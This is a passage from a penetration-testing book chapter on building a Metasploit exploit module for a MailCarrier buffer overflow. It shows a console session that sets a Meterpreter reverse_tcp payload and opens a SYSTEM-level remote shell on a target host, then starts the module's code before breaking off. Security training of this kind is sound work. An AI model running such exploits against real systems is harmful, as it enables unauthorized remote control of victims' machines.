background image

224

Chapter 15

Figure 15-3: Randomized MailCarrier buffer

The 

payload.encoded

 function tells Metasploit to append the indicated 

payload to the end of the malicious string at run time. 

Now, when we load our module, set a real payload, and execute it, we 

should be presented with our hard-earned shell, as shown here:

msf exploit(mailcarrier_book) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(mailcarrier_book) > 

exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1265)

meterpreter > 

getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter >

Our Completed Module

Just to wrap things up, here is the complete and final code for this Metasploit 
exploit module:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
       Rank = GoodRanking
       
       include Msf::Exploit::Remote::Tcp